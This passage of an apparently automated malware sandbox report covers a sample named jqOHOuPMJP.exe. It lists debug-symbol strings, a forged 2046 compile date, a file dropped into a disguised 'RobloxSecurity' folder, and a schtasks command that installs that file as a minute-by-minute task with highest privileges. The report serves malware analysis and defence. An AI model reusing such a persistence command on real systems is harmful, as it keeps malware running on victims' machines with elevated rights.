                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2a source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*TOP-A source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: cmd.exe, 00000005.00000003.1850351981.0000022BB8350000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdbWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Drawing.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2S source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\vkefq4cv.oil.exe source: cmd.exe, 00000005.00000002.1851434800.0000022BB8158000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Core.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: mscorlib.pdb! source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Configuration.pdbx source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Windows.Forms.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD37000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831EneJ source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: winload_prod.pdbWINLOA~1.PDBWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*0 source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Management.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Drawing.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2E source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\Boss\Desktop\Laps\Laps\obj\Release\Laps.pdb source: jqOHOuPMJP.exe
                  Source: Binary string: System.Management.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Core.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831o source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831n source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbR source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD0C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: ntkrnlmp.pdbl source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: jqOHOuPMJP.exeStatic PE information: 0x8F4114C5 [Wed Feb 28 05:04:05 2046 UTC]
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_067EE438 pushad ; iretd 0_2_067EE445
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_067E648F push es; ret 0_2_067E6490
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_067E6592 push esp; ret 0_2_067E6599
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_067E7162 push eax; retf 0_2_067E7169
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04F5632D push eax; ret 1_2_04F56341
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04F53A9B push ebx; retf 1_2_04F53ADA
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeFile created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeFile created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
